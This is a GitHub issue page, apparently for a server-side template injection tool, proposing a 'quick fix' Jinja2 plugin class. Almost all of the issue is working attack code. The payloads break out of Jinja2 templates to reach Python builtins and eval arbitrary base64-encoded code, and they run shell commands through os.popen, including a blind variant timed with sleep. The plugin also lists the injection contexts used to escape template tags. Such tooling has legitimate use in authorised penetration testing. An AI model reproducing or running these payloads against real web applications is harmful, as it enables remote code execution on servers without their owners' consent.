Skip to content

quick fix for jinja2 non blind shell capabilities #44

New issue
New issue
Closed
Closed
quick fix for jinja2 non blind shell capabilities#44
Labels
bugSomething isn't workingenhancementNew feature or request
@bUst4gr0

Description

@bUst4gr0
bUst4gr0
opened on Nov 4, 2024
from plugins.languages import python
from utils import rand
from core import bash



class Jinja2(python.Python):
    def init(self):
        self.update_actions({
            'render': {
                'render': '{code}',
                'header': '{{{{{header[0]}+{header[1]}}}}}',
                'trailer': '{{{{{trailer[0]}+{trailer[1]}}}}}',
                'test_render': f'{{{{({rand.randints[0]},{rand.randints[1]}*{rand.randints[2]})|e}}}}',
                'test_render_expected': f'{(rand.randints[0],rand.randints[1]*rand.randints[2])}'
            },
            'evaluate': {
                'evaluate': """{{{{self.__init__.__globals__.__builtins__.eval(self.__init__.__globals__.__builtins__.eval('__import__("base64").urlsafe_b64decode("{code_b64}").decode()'))}}}}""",
		'test_os': 'sys.platform', #__import__("platform").platform()
                'test_os_expected': r'[a-z]+'
            },
            'execute': {
                'call': 'render',
                'execute': """{{{{namespace.__init__.__globals__.os.popen('$(echo "{code_b64}"|base64 -d)').read()}}}}""",
                'test_cmd': bash.os_print.format(s1=rand.randstrings[2]),
                'test_cmd_expected': rand.randstrings[2] 
            },
            'execute_blind': {
                'execute_blind': """{{{{namespace.__init__.__globals__.os.popen('$(echo "{code_b64}"| base64 -d) && sleep {delay}')}}}}"""
            },
        })

        self.set_contexts([
            # Text context, no closures
            {'level': 0},
            # This covers {{%s}}
            {'level': 1, 'prefix': '{closure}}}}}', 'suffix': '', 'closures': python.ctx_closures},
            # This covers {% %s %}
            {'level': 1, 'prefix': '{closure}%}}', 'suffix': '', 'closures': python.ctx_closures},
            # If and for blocks
            # # if %s:\n# endif
            # # for a in %s:\n# endfor
            {'level': 5, 'prefix': '{closure}\n', 'suffix': '\n', 'closures': python.ctx_closures},
            # Comment blocks
            {'level': 5, 'prefix': '#}}', 'suffix': '{#'},

        ])```

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't workingenhancementNew feature or request

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions